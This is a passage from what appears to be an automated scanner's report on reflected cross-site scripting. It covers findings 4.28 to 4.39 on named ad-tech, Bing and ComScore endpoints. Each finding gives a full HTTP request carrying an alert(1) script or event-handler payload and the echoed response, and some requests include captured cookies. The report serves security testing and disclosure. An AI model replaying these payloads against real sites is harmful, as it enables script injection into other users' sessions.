Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925;sz=728x90;click=;ord=1311108561;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342;?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.28. http://a.netmng.com/hic/ [passback&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the passback&click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2db4"><script>alert(1)</script>d8f75878460 was submitted in the passback&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:48:56 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:48:56 GMT
Last-Modified: Sun, 17 Jul 2011 20:48:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H73b%2BWMSS4bgT4NMNPegiWg2gzqKqyo%2BTygjivpTJSduHkiCxwBCHW8sJDNQdsByRkZ%2Bca%2FXNMPxFxzuqfYBik1k%3D; expires=Wed, 18-Jan-2012 20:48:56 GMT; path=/
Set-Cookie: evo5_display=NXTVl5Jg12H73qXg2AB994UKMGdm1eFpHgSl3bE9WM75aU%2Bt%2FiMh%2BJjrcp%2Fxd6sOu8CRr1gQYDywBmKz%2FYbePA%3D%3D; expires=Thu, 23-Jun-44591 20:48:56 GMT; path=/; domain=.netmng.com
Content-Length: 1646
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108536;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=165
...[SNIP]...
36;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=c2db4"><script>alert(1)</script>d8f75878460;?">
...[SNIP]...

4.29. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16176'-alert(1)-'789f99fe84a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=19316176'-alert(1)-'789f99fe84a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:09 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:09 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:44:09 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=19316176'-alert(1)-'789f99fe84a&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

4.30. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca443'-alert(1)-'8f1f478f920 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchca443'-alert(1)-'8f1f478f920 HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:44:43 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchca443'-alert(1)-'8f1f478f920?admeld_adprovider_id=193&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

4.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d7d5'%3balert(1)//a883b6014f was submitted in the admeld_adprovider_id parameter. This input was echoed as 4d7d5';alert(1)//a883b6014f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=734d7d5'%3balert(1)//a883b6014f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:29 GMT
Expires: Tue, 19 Jul 2011 20:44:30 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:30 GMT; Path=/
Content-Type: text/plain
Content-Length: 191
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=734d7d5';alert(1)//a883b6014f&external_user_id=3449391312096071132"/>');

4.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bba35'%3balert(1)//26ade494141 was submitted in the admeld_callback parameter. This input was echoed as bba35';alert(1)//26ade494141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchbba35'%3balert(1)//26ade494141 HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:34 GMT
Expires: Tue, 19 Jul 2011 20:44:34 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:34 GMT; Path=/
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/matchbba35';alert(1)//26ade494141?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

4.33. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 was submitted in the q parameter. This input was echoed as f4d2c<img src=a onerror=alert(1)>ad5e9767223 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?FORM=ASAPIV&q=f4d2c<img%20src%3da%20onerror%3dalert(1)>ad5e9767223 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/search?q='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3ehoyt(0x006623)%3c%2fscript%3e%4E%45%57%53%46%4C%41%53%48%3A%20%4D%53%46%54%20%73%65%6C%6C%73%20%74%6F%20%41%50%50%4C%20%61%6E%64%20%47%4F%4F%47%20%69%6E%20%66%69%72%65%73%61%6C%65%20%6C%69%71%75%69%64%61%74%69%6F%6E%2E&FORM=O1FD
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723&bIm=510; RMS=F=GgAg&A=AAAAAAAAAAAQAAAk; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2cc751fa2acb014433bae3e06d300eae0d; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: af1b3ddfac804d0092ef7cc9392fca85
Date: Tue, 19 Jul 2011 14:28:18 GMT
Connection: close

{"AS":{"Query":"f4d2c<img src=a onerror=alert(1)>ad5e9767223","FullResults":1}}

4.34. http://api.choicestream.com/instr/api/8e360375d27a5381/a1 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/api/8e360375d27a5381/a1

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2a4f9<script>alert(1)</script>ecd36545afc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 72db13ee-64b3-4cd9-915b-53b66435f1ec
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:15 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 122
Cache-Control: private
Content-Length: 122
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 18:36:35 GMT
Connection: close
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:15 GMT; Path=/

csAny.Transport.callback2a4f9<script>alert(1)</script>ecd36545afc('0',{"status":{"message":"OK","code":0},"reco_sets":[]})

4.35. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3b34b<script>alert(1)</script>bfb92715a68 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83b34b<script>alert(1)</script>bfb92715a68&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:57 GMT
Date: Tue, 19 Jul 2011 20:42:57 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"83b34b<script>alert(1)</script>bfb92715a68", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.36. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 47da7<script>alert(1)</script>399492637bb was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=17426647da7<script>alert(1)</script>399492637bb&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:01 GMT
Date: Tue, 19 Jul 2011 20:43:01 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"17426647da7<script>alert(1)</script>399492637bb", c15:"", c16:"", r:""});



4.37. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload e0738<script>alert(1)</script>71db0b72094 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15=e0738<script>alert(1)</script>71db0b72094 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:43:03 GMT
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"e0738<script>alert(1)</script>71db0b72094", c16:"", r:""});



4.38. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 339fa<script>alert(1)</script>4092f63da71 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113339fa<script>alert(1)</script>4092f63da71&c3=37&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:58 GMT
Date: Tue, 19 Jul 2011 20:42:58 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113339fa<script>alert(1)</script>4092f63da71", c3:"37", c4:"16565", c5:"28159", c6:"", c10:"174266", c15:"", c16:"", r:""});



4.39. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d6c50<script>alert(1)</script>bbe75eec2e7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=37d6c50<script>alert(1)</script>bbe75eec2e7&c4=16565&c5=28159&c6=&c10=174266&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 26 Jul 2011 20:42:59 GMT
Date: Tue, 19 Jul 2011 20:42:59 GMT
